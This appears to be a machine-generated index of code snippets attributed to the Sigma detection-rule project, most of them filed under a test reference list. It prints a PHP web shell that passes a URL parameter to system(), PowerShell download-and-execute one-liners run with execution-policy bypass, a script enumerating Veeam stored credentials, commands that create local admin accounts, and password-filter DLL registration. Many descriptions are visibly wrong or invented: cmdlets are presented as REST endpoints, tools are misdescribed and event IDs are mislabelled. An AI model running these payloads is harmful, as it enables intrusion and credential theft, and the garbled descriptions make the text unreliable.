### Install Sysmon with Configuration Source: https://github.com/sigmahq/sigma/blob/master/documentation/logsource-guides/windows/category/process_creation.md Installs Sysmon with a specified configuration file. Ensure the configuration includes a element. ```powershell sysmon -i /path/to/config ``` -------------------------------- ### WMIExec Example - Python Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Example usage of WMIExec from the impacket library. ```python examples/wmiexec.py ``` -------------------------------- ### InstallUtil.exe Assembly Registration Tool Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Installs and uninstalls Windows Installer components and registers assemblies. Used for deploying .NET applications that require specific installation steps. ```powershell InstallUtil.exe "C:\\path\\to\\YourApp.exe" ``` -------------------------------- ### Start a Process Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Starts a new process. Can be used to launch applications or scripts. ```powershell Start-Process -FilePath "notepad.exe" ``` -------------------------------- ### Start-Process Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Starts one or more processes. ```APIDOC ## Start-Process ### Description Starts one or more processes. ### Method POST ### Endpoint /Start-Process ### Parameters #### Query Parameters - **FilePath** (string) - Required - The path to the executable file. - **ArgumentList** (string[]) - Optional - Arguments to pass to the process. - **Wait** (bool) - Optional - Waits for the process to exit before returning. ### Request Example ```powershell Start-Process -FilePath "notepad.exe" -ArgumentList "C:\MyFile.txt" -Wait ``` ### Response #### Success Response (200) - **Process** (Process) - The started process object. #### Response Example ```json { "Process": "" } ``` ``` -------------------------------- ### SMBExec Example - Python Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Example usage of SMBExec from the impacket library. ```python examples/smbexec.py ``` -------------------------------- ### Create and Start Hyper-V Virtual Machine Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Creates and starts a Hyper-V virtual machine. This can be used for various purposes, including C2 infrastructure or malware execution. ```powershell New-VM -Name "TestVM" -MemoryStartupBytes 512MB -NewVHDPath "C:\\VMs\\TestVM.vhdx" -NewVHDSizeBytes 20GB Start-VM -Name "TestVM" ``` -------------------------------- ### Installer File Takeover Vulnerability Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This GitHub repository is related to the 'Installer File Takeover' vulnerability, which allows for privilege escalation by manipulating installer processes. ```text https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver ``` -------------------------------- ### Install PowerShell Core Policy Definitions Source: https://github.com/sigmahq/sigma/blob/master/documentation/logsource-guides/windows/category/ps_module.md Command to install the necessary Group Policy template for PowerShell Core logging if it's not present by default after installation. ```powershell InstallPSCorePolicyDefinitions.ps1 ``` -------------------------------- ### Windows Privilege Escalation Guide Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This comprehensive guide details various techniques for achieving privilege escalation on Windows systems. It covers common vulnerabilities, misconfigurations, and exploits that attackers can leverage to gain higher privileges. ```powershell # Example: Checking for unquoted service paths Get-Service | Where-Object {$_.PathName -notlike "`"*`"" -and $_.PathName -notlike "C:\Windows\*"} ``` -------------------------------- ### RegSvcs.exe .NET Services Installation Tool Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Installs or uninstalls .NET components into a COM+ catalog. Used for deploying services that leverage COM+ features. ```powershell regsvcs.exe "C:\\path\\to\\YourService.dll" ``` -------------------------------- ### Execute INF file using InfDefaultInstall.exe Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This command executes an INF file using InfDefaultInstall.exe. This can be used to install drivers or to execute commands embedded within the INF file. ```cmd InfDefaultInstall.exe "C:\Path\To\MyDriver.inf" ``` -------------------------------- ### About Profiles Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Information regarding PowerShell profiles. These scripts run when PowerShell starts, allowing for custom configurations. ```powershell Get-Help about_Profiles ``` -------------------------------- ### Get-Process Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Gets the processes that are running on the local computer or a remote computer. ```APIDOC ## Get-Process ### Description Gets the processes that are running on the local computer or a remote computer. ### Method GET ### Endpoint /Get-Process ### Parameters #### Query Parameters - **Name** (string) - Optional - Specifies the name of the process. - **ComputerName** (string) - Optional - Specifies the computer on which to run the command. ### Request Example ```powershell Get-Process -Name "notepad" -ComputerName "Server01" ``` ### Response #### Success Response (200) - **ProcessName** (string) - The name of the process. - **Id** (int) - The process ID. - **CPU** (double) - The CPU usage of the process. #### Response Example ```json { "ProcessName": "notepad", "Id": 1234, "CPU": 0.5 } ``` ``` -------------------------------- ### Create and Execute Batch Script (Batch) Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Creates and executes a simple batch script. This is a basic example of script execution for command and control or task automation. ```batch @echo off echo Hello, World! > output.txt exit ``` -------------------------------- ### Detect AnyDesk Files on Windows Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This snippet checks for the presence of AnyDesk installation files on a Windows system. ```powershell Get-ChildItem -Path C:\\Program Files\\AnyDesk\\ -Recurse -ErrorAction SilentlyContinue | Where-Object { $_.Name -like "*AnyDesk*" } ``` -------------------------------- ### Detect GoToAssist Application Download and Install on Windows Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This snippet checks for the presence of the GoToAssist application on a Windows system. ```powershell Get-ChildItem -Path "C:\\Program Files (x86)\\GoToAssist\\" -Recurse -ErrorAction SilentlyContinue | Where-Object { $_.Name -like "*GoToAssist*" } ``` -------------------------------- ### Port Scan using Python Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Executes a port scan against a target IP address using a Python script. This example demonstrates a programmatic approach to network scanning. ```python import socket target_ip = "192.168.1.1" target_ports = [80, 443, 22, 3389] for port in target_ports: try: with socket.create_connection((target_ip, port), timeout=1): print(f"Port {port} is open") except (socket.timeout, ConnectionRefusedError): print(f"Port {port} is closed") ``` -------------------------------- ### Web Shells 101: Using PHP Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This article provides an introduction to web shells, focusing on their creation and usage with PHP. It explains how web shells can be used to execute commands on a web server and may cover detection and mitigation strategies. ```php "; $cmd = ($_GET['cmd']); system($cmd); echo ""; } ?> ``` -------------------------------- ### Run Python HTTP Server Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This snippet demonstrates how to start a simple HTTP server using Python 3. It's useful for quickly serving files over a local network during testing or for simple data exfiltration scenarios. ```python python3 -m http.server 8000 ``` -------------------------------- ### Enable OpenSSH Server on Windows 10 Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This guide explains how to enable and configure the OpenSSH server on Windows 10, allowing for secure remote access to the system via SSH. ```powershell Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0 Start-Service sshd -Force Set-Service -Name sshd -StartupType 'Automatic' # Firewall rule for SSH (port 22) New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22 ``` -------------------------------- ### AudioDeviceCmdlets Project Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Cmdlets for managing audio devices. ```unknown AudioDeviceCmdlets ``` -------------------------------- ### Install Service Principal Name (SPN) - PowerShell Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt PowerShell script for installing a Service Principal Name (SPN). ```powershell Install-SSP ``` -------------------------------- ### JavaScript Code for Bun Environment Setup Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This JavaScript code snippet configures the Bun environment for the AsyncAPI CLI. It sets up environment variables and paths necessary for Bun to function correctly. ```javascript const { env } = process; module.exports = { // ... other config plugins: [ // ... other plugins require('@asyncapi/bundler/plugins/bun') ], hooks: { // ... other hooks async afterBuild() { // ... other afterBuild logic env.PATH = `${env.HOME}/.bun/bin:${env.PATH}`; }, }, }; ``` -------------------------------- ### Install and Register Password Filter DLL Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Installs and registers a password filter DLL. This technique can be used to intercept password changes. ```powershell regsvr32 /s C:\\Path\\To\\Your\\PasswordFilter.dll ``` -------------------------------- ### Understanding Windows Command Line Arguments Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This resource explains how Windows programs receive command-line strings and arguments, crucial for analyzing process execution and detecting suspicious commands. ```text https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/ ``` -------------------------------- ### Mount ISO and Run Executable Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This test mounts an ISO image and then runs an executable from within the mounted image. ```powershell powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/T1553.005.ps1'); Invoke-AtomicTest T1553.005 -MethodName 'AtomicTest2'" ``` -------------------------------- ### Get-WmiObject Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Gets instances of Windows Management Instrumentation (WMI) classes. ```APIDOC ## Get-WmiObject ### Description Gets instances of Windows Management Instrumentation (WMI) classes. ### Method GET ### Endpoint /Get-WmiObject ### Parameters #### Query Parameters - **ClassName** (string) - Required - The name of the WMI class. - **Filter** (string) - Optional - A WQL filter to apply. ### Request Example ```powershell Get-WmiObject -ClassName "Win32_OperatingSystem" -Filter "OSName = 'Windows 10'" ``` ### Response #### Success Response (200) - **Properties** (object) - The properties of the WMI object. #### Response Example ```json { "Properties": { "OSName": "Windows 10", "Version": "10.0.19045" } } ``` ``` -------------------------------- ### SharpUp Project Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Project for privilege escalation. ```unknown SharpUp ``` -------------------------------- ### Directory Create 2 System (Text) Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This text file contains a command or instruction related to creating a directory that is accessible system-wide. The exact command is not shown, but the context suggests a system-level directory operation. ```text dir_create2system ``` -------------------------------- ### Discover Security Software with PowerShell Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This PowerShell snippet discovers installed security software by querying the registry. ```powershell Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, Publisher, InstallDate | Format-Table -AutoSize ``` -------------------------------- ### Detect LogMeIn Files on Windows Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This snippet checks for the presence of LogMeIn installation files on a Windows system. ```powershell Get-ChildItem -Path "C:\\Program Files\\LogMeIn\\" -Recurse -ErrorAction SilentlyContinue | Where-Object { $_.Name -like "*LogMeIn*" } ``` -------------------------------- ### Mount ISO Image Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This test demonstrates mounting an ISO image. ```powershell powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8000/T1553.005.ps1'); Invoke-AtomicTest T1553.005 -MethodName 'AtomicTest1'" ``` -------------------------------- ### Create Local Account with Admin Privileges using sysadminctl (macOS) Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This snippet shows how to create a local administrator account on macOS using the `sysadminctl` utility. This is an alternative method for privilege escalation. ```bash sudo sysadminctl -addUser testadmin -fullName "Test Admin" -password password -admin ``` -------------------------------- ### Detect TeamViewer Files on Windows Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This snippet checks for the presence of TeamViewer installation files on a Windows system. ```powershell Get-ChildItem -Path C:\\Program Files\\TeamViewer\\ -Recurse -ErrorAction SilentlyContinue | Where-Object { $_.Name -like "*TeamViewer*" } ``` -------------------------------- ### KohClient.c - C Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt C source file for KohClient. ```c Clients/BOF/KohClient.c ``` -------------------------------- ### Take Ownership Using TakeOwn Utility Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This PowerShell snippet demonstrates using the 'takeown' utility to take ownership of a file. ```powershell takeown /f C:\\Windows\\System32\\drivers\\etc\\hosts ``` -------------------------------- ### Get Process Information Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Retrieves a list of running processes on the system. Useful for monitoring and resource management. ```powershell Get-Process -Name "chrome" ``` -------------------------------- ### JIT Dump Configuration Variables Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Documentation on setting configuration variables for Just-In-Time (JIT) dumps in the .NET runtime. This allows developers to control diagnostic output. ```markdown ## Setting Configuration Variables To enable JIT dumps, you can set the following environment variables: * `COMPlus_JitDump`: Set to `1` to enable JIT dumps. * `COMPlus_JitMethodTracing`: Set to `1` to enable method tracing. These variables can be set before running your application. ``` -------------------------------- ### AWS STS API Operations Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Provides documentation for assuming roles with SAML and getting session tokens. ```APIDOC ## ASSUME Role ### Description Returns a set of temporary security credentials that you can use to access AWS resources. ### Method POST ### Endpoint / (root) ### Parameters #### Query Parameters - **Action** (string) - Required - `AssumeRole` - **Version** (string) - Required - `2011-06-15` #### Request Body - **RoleArn** (string) - Required - The Amazon Resource Name (ARN) of the role to assume. - **RoleSessionName** (string) - Required - An identifier for the assumed role session. - **DurationSeconds** (integer) - Optional - The duration, in seconds, of the session. ### Request Example ```json { "RoleArn": "arn:aws:iam::123456789012:role/MyRole", "RoleSessionName": "MySession", "DurationSeconds": 3600 } ``` ### Response #### Success Response (200 OK) - **Credentials** (object) - Security credentials for the assumed role. - **AccessKeyId** (string) - The access key ID. - **SecretAccessKey** (string) - The secret access key. - **SessionToken** (string) - The session token. - **Expiration** (string) - The expiration date and time of the credentials. ## ASSUME Role With SAML ### Description Returns a set of temporary security credentials for users authenticated with an SAML identity provider. ### Method POST ### Endpoint / (root) ### Parameters #### Query Parameters - **Action** (string) - Required - `AssumeRoleWithSAML` - **Version** (string) - Required - `2011-06-15` #### Request Body - **RoleArn** (string) - Required - The ARN of the role to assume. - **PrincipalArn** (string) - Required - The ARN of the SAML provider. - **SAMLAssertion** (string) - Required - The SAML assertion. - **Policy** (string) - Optional - A policy that can be used only by the IAM principal that is making the call to assume the role. - **PolicyArns** (array of objects) - Optional - An array of ARNs that are used to formulate the IAM principal's policy. - **DurationSeconds** (integer) - Optional - The duration, in seconds, of the session. ### Request Example ```json { "RoleArn": "arn:aws:iam::123456789012:role/MyRole", "PrincipalArn": "arn:aws:iam::123456789012:saml-provider/MySAMLProvider", "SAMLAssertion": "PHNhbWxwOlJlc3BvbnNlIHhtbG5zOnNhbWxwPS...", "DurationSeconds": 3600 } ``` ### Response #### Success Response (200 OK) - **Credentials** (object) - Security credentials for the assumed role. - **AccessKeyId** (string) - The access key ID. - **SecretAccessKey** (string) - The secret access key. - **SessionToken** (string) - The session token. - **Expiration** (string) - The expiration date and time of the credentials. ## GET Session Token ### Description Returns a set of temporary security credentials that you can use to access AWS resources. ### Method POST ### Endpoint / (root) ### Parameters #### Query Parameters - **Action** (string) - Required - `GetSessionToken` - **Version** (string) - Required - `2011-06-15` #### Request Body - **DurationSeconds** (integer) - Optional - The duration, in seconds, of the session. - **SerialNumber** (string) - Optional - The serial number of the MFA device. - **TokenCode** (string) - Optional - The MFA code. ### Request Example ```json { "DurationSeconds": 3600, "SerialNumber": "arn:aws:iam::123456789012:mfa/user", "TokenCode": "123456" } ``` ### Response #### Success Response (200 OK) - **Credentials** (object) - Security credentials for the session. - **AccessKeyId** (string) - The access key ID. - **SecretAccessKey** (string) - The secret access key. - **SessionToken** (string) - The session token. - **Expiration** (string) - The expiration date and time of the credentials. ``` -------------------------------- ### WMImplant Project Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Project for WMI-based implants. ```unknown WMImplant ``` -------------------------------- ### Process Discovery (Tasklist) Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Lists running processes on the system using the 'tasklist' command. This is a fundamental technique for process discovery. ```bash tasklist ``` -------------------------------- ### Windows Security Auditing Event Source Source: https://github.com/sigmahq/sigma/blob/master/documentation/logsource-guides/windows/service/security.md Defines the provider, GUID, and channel for Windows Security Auditing logs. ```yml Provider: Microsoft Windows Security Auditing GUID: {54849625-5478-4994-a5ba-3e3b0328c30d} Channel: Security ``` -------------------------------- ### Get Active Directory Computer Information Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Retrieves information about Active Directory computers. Useful for inventory and auditing. ```powershell Get-ADComputer -Filter * | Select-Object Name, OperatingSystem, IPv4Address ``` -------------------------------- ### Create Linux Systemd Service Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This Bash snippet demonstrates creating a new Linux systemd service. ```bash [Unit] Description=My Service [Service] ExecStart=/usr/bin/my_executable Restart=always [Install] WantedBy=multi-user.target ``` -------------------------------- ### Get Running Processes Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Retrieves a list of currently running processes on the system. Useful for system monitoring and troubleshooting. ```powershell Get-Process ``` -------------------------------- ### KeeThief Project Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Project for interacting with Kerberos. ```unknown KeeThief ``` -------------------------------- ### Windows EventID 4673 Fields Source: https://github.com/sigmahq/sigma/blob/master/documentation/logsource-guides/windows/service/security.md Fields for a service was started (EventID 4673). Useful for monitoring the initiation of system services. ```yml - SubjectUserSid - SubjectUserName - SubjectDomainName - SubjectLogonId - ObjectServer - Service - PrivilegeList - ProcessId - ProcessName ``` -------------------------------- ### Get Windows Event Log Entries Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Retrieves event log entries from Windows. Useful for troubleshooting and security auditing. ```powershell Get-WinEvent -FilterHashtable @{LogName='Application'; ID=100} ``` -------------------------------- ### DLL Side-Loading via AppVerify.exe Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This blog post details a DLL side-loading technique using AppVerify.exe, a method often employed by attackers to execute malicious code disguised as legitimate processes. ```text https://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/ ``` -------------------------------- ### Sysmon Configuration for Threat Hunting Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This PDF likely provides guidance on configuring Sysmon for effective threat hunting. It may include recommended event IDs to monitor, filtering strategies, and examples of detection rules. ```xml \powershell.exe ``` -------------------------------- ### PowerShell Script for Getting DX Webcam Video Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This PowerShell script retrieves video information from DirectShow compatible webcams. ```powershell #Requires -Version 5.1 <# .SYNOPSIS Gets video information from DirectShow compatible webcams. .DESCRIPTION This script enumerates DirectShow compatible webcams and retrieves their video capabilities. .EXAMPLE . Get-DXWebcamVideo.ps1 .NOTES Author: xorrior Date: 2021-01-01 #> Add-Type -AssemblyName System.Drawing $devices = [System.Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() foreach ($device in $devices) { Write-Host "Device Name: $($device.CodecName)" Write-Host "Device Description: $($device.Description)" Write-Host "Device Filename: $($device.Filename)" Write-Host "Device Format: $($device.FormatDescription)" Write-Host "Device MIME Type: $($device.MimeType)" Write-Host "----------------------------------------" } ``` -------------------------------- ### System Discovery using SharpView Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Utilizes the SharpView tool for system discovery, which can enumerate various aspects of the system and network. This is often used in post-exploitation phases. ```powershell SharpView.exe Discovery -ComputerName "TARGET" ``` -------------------------------- ### Windows EventID 4689 Fields Source: https://github.com/sigmahq/sigma/blob/master/documentation/logsource-guides/windows/service/security.md Fields for a process has exited (EventID 4689). Useful for correlating process start and end times. ```yml - SubjectUserSid - SubjectUserName - SubjectDomainName - SubjectLogonId - Status - ProcessId - ProcessName ``` -------------------------------- ### Get ADDBAccount PowerShell Cmdlet Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt PowerShell cmdlet to retrieve AD database accounts. Used for analyzing Active Directory data. ```powershell param( [Parameter(Mandatory=$true)] [string[]]$Path ) Process { foreach ($path in $Path) { Get-ADDBAccount -Path $path | Format-Table } } ``` -------------------------------- ### Get WMI Object Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Retrieves information from Windows Management Instrumentation (WMI). A powerful tool for system administration and data collection. ```powershell Get-WmiObject -Class Win32_OperatingSystem ``` -------------------------------- ### Create Windows Service Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This PowerShell snippet demonstrates creating a new Windows service. ```powershell sc.exe create MyService binPath= "C:\\path\\to\\executable.exe" start= auto ``` -------------------------------- ### calc.exe.inf file content Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This snippet displays the content of an INF file, potentially used for software installation or configuration, found in a security context. ```ini [autorun] open=calc.exe icon=calc.exe ``` -------------------------------- ### System Information Discovery (PowerShell) Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Retrieves system information using PowerShell. This is a common reconnaissance step for adversaries to understand the target environment. ```powershell Get-ComputerInfo ``` -------------------------------- ### Get-ADS PowerShell Script Snippet Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt A snippet from the Get-ADS.ps1 script, which is used for querying Active Directory objects. This example retrieves user information. ```powershell Get-ADS -ObjectType User -Filter 'Name -like "*test*"' -Properties Name, SamAccountName, Enabled ``` -------------------------------- ### MSDeploy Executable Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Command-line utility for deploying applications, databases, and configurations. Used for web application deployment and synchronization. ```powershell msdeploy.exe -verb:sync -source:contentPath=C:\\inetpub\\wwwroot -dest:contentPath=C:\\inetpub\\newroot ``` -------------------------------- ### Enable Logon Auditing (Success Only) Source: https://github.com/sigmahq/sigma/blob/master/documentation/logsource-guides/windows/service/security.md Enables success auditing for Logon events using auditpol. This command targets the specific subcategory GUID. ```powershell auditpol /set /subcategory:{0CCE9215-69AE-11D9-BED3-505054503030}, /success:enable ``` -------------------------------- ### Enable Logoff Auditing (Success Only) Source: https://github.com/sigmahq/sigma/blob/master/documentation/logsource-guides/windows/service/security.md Enables success auditing for Logoff events using auditpol. This command targets the specific subcategory GUID. ```powershell auditpol /set /subcategory:{0CCE9216-69AE-11D9-BED3-505054503030}, /success:enable ``` -------------------------------- ### New-PSDrive Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Creates a new Windows PowerShell drive. ```APIDOC ## New-PSDrive ### Description Creates a new Windows PowerShell drive. ### Method POST ### Endpoint /New-PSDrive ### Parameters #### Query Parameters - **Name** (string) - Required - The name of the drive. - **PSProvider** (string) - Required - The provider for the drive. - **Root** (string) - Required - The root path for the drive. ### Request Example ```powershell New-PSDrive -Name "MyData" -PSProvider "FileSystem" -Root "C:\Data" ``` ### Response #### Success Response (200) - **Name** (string) - The name of the created drive. #### Response Example ```json { "Name": "MyData" } ``` ``` -------------------------------- ### Enable User/Device Claims Auditing (Success) Source: https://github.com/sigmahq/sigma/blob/master/documentation/logsource-guides/windows/service/security.md Enables success auditing for User/Device Claims using auditpol. Requires the specific subcategory GUID. ```powershell auditpol /set /subcategory:{0CCE9247-69AE-11D9-BED3-505054503030}, /success:enable ``` -------------------------------- ### Configure JIT Dump Settings Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Configuration settings for enabling Just-In-Time (JIT) dumps in the .NET runtime. This is useful for debugging and performance analysis. ```ini COMPlus_JitDump=1 ``` -------------------------------- ### Enable Account Lockout Auditing (Success) Source: https://github.com/sigmahq/sigma/blob/master/documentation/logsource-guides/windows/service/security.md Enables success auditing for Account Lockout using auditpol. Requires the specific subcategory GUID. ```powershell auditpol /set /subcategory:{0CCE9217-69AE-11D9-BED3-505054503030}, /success:enable ``` -------------------------------- ### Evading Sysmon and Windows Event Logging Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This blog post discusses techniques for evading Sysmon and standard Windows event logging, relevant for understanding detection evasion. ```text https://web.archive.org/web/20200419024230/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/ ``` -------------------------------- ### Get Current User (PowerShell) Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Retrieves the current user's identity using PowerShell. This is a straightforward method for obtaining user context. ```powershell [System.Security.Principal.WindowsIdentity]::GetCurrent().Name ``` -------------------------------- ### Validate Sigma rules using Sigma CLI Source: https://github.com/sigmahq/sigma/blob/master/CONTRIBUTING.md Use the Sigma CLI to perform schema and validation checks on rules. Ensure you have sigma installed. ```bash sigma check --fail-on-error --fail-on-issues --validation-config tests/sigma_cli_conf.yml rules/ rules-emerging-threats/ rules-threat-hunting/ rules-compliance/ ``` -------------------------------- ### NodeRelayDll.cpp - C++ Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt C++ source file for NodeRelayDll. ```cpp Src/NodeRelayDll/NodeRelayDll.cpp ``` -------------------------------- ### Create Local Account with Admin Privileges (macOS) Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This snippet demonstrates how to create a local administrator account on macOS. It is used for privilege escalation testing. ```bash sudo dscl . -create /Users/testadmin sudo dscl . -create /Users/testadmin UserShell /bin/bash sudo dscl . -create /Users/testadmin RealName "Test Admin" sudo dscl . -create /Users/testadmin UniqueID "501" sudo dscl . -create /Users/testadmin PrimaryGroupID 80 sudo dscl . -create /Users/testadmin NFSHomeDirectory /Users/testadmin sudo dscl . -passwd /Users/testadmin 'password' sudo dscl . -append /Groups/admin GroupMembership testadmin ``` -------------------------------- ### Enable Registry Auditing (Success Only) Source: https://github.com/sigmahq/sigma/blob/master/documentation/logsource-guides/windows/service/security.md Enables success auditing for the 'Registry' subcategory using its GUID. This command is useful for monitoring successful registry modifications. ```powershell # Enable Success audit Only auditpol /set /subcategory:{0CCE921E-69AE-11D9-BED3-505054503030}, /success:enable ``` -------------------------------- ### New-PSSession Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Creates a persistent connection to a remote computer. ```APIDOC ## New-PSSession ### Description Creates a persistent connection to a remote computer. ### Method POST ### Endpoint /New-PSSession ### Parameters #### Query Parameters - **ComputerName** (string) - Required - The name of the remote computer. - **Credential** (PSCredential) - Optional - The user credentials to use for the connection. ### Request Example ```powershell New-PSSession -ComputerName "Server01" -Credential "Domain\User" ``` ### Response #### Success Response (200) - **PSSession** (PSSession) - The created PSSession object. #### Response Example ```json { "PSSession": "" } ``` ``` -------------------------------- ### Get Credentials from Veeam (PowerShell) Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt This PowerShell script retrieves credentials stored within Veeam Backup & Replication. It requires the Veeam PowerShell module. ```powershell # Requires Veeam PowerShell module. # Example: . # Veeam-Get-Creds.ps1 -Server "VBRServer.domain.local" param( [Parameter(Mandatory=$true)] [string]$Server ) # Import Veeam module if not loaded if (-not (Get-Module -ListAvailable -Name VeeamPSSnapin)) { Add-PSSnapin -Name VeeamPSSnapin -ErrorAction SilentlyContinue } try { # Connect to the Veeam server $vbrServer = Connect-VBRServer -Server $Server # Retrieve all credential objects $credentials = Get-VBRCredentials if ($credentials) { Write-Host "Found $($credentials.Count) credentials on $Server:" $credentials | Format-Table Name, Type, Description -AutoSize # You can further process these credentials, e.g., export them securely. } else { Write-Host "No credentials found on $Server." } # Disconnect from the server Disconnect-VBRServer -Server $vbrServer } catch { Write-Error "An error occurred: $($_.Exception.Message)" } ``` -------------------------------- ### LDAPFragger Project Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Project for interacting with LDAP. ```unknown LDAPFragger ``` -------------------------------- ### Get ADUser Enumeration (PowerShell) Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Enumerates Active Directory users using the Get-ADUser cmdlet. This is useful for simulating adversary reconnaissance of user accounts. ```powershell Get-ADUser -Filter * ``` -------------------------------- ### Get Group Policy Object Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Retrieves a Group Policy Object (GPO). This is essential for managing and auditing system configurations via Group Policy. ```powershell Get-GPO -Name "" ``` -------------------------------- ### Create Custom Rule Package Source: https://github.com/sigmahq/sigma/blob/master/Releases.md Use this command to generate a ZIP archive containing rules that meet specific criteria for status, levels, and types. The script allows for space-separated lists or minimum values for these parameters. ```bash python3 tests/sigma-package-release.py --min-status testing --levels high critical --types generic --outfile Sigma-custom.zip ``` -------------------------------- ### Get Default Domain Password Policy Source: https://github.com/sigmahq/sigma/blob/master/tests/rule-references.txt Retrieves the default password policy for an Active Directory domain. Useful for security audits and policy enforcement. ```powershell Get-ADDefaultDomainPasswordPolicy ```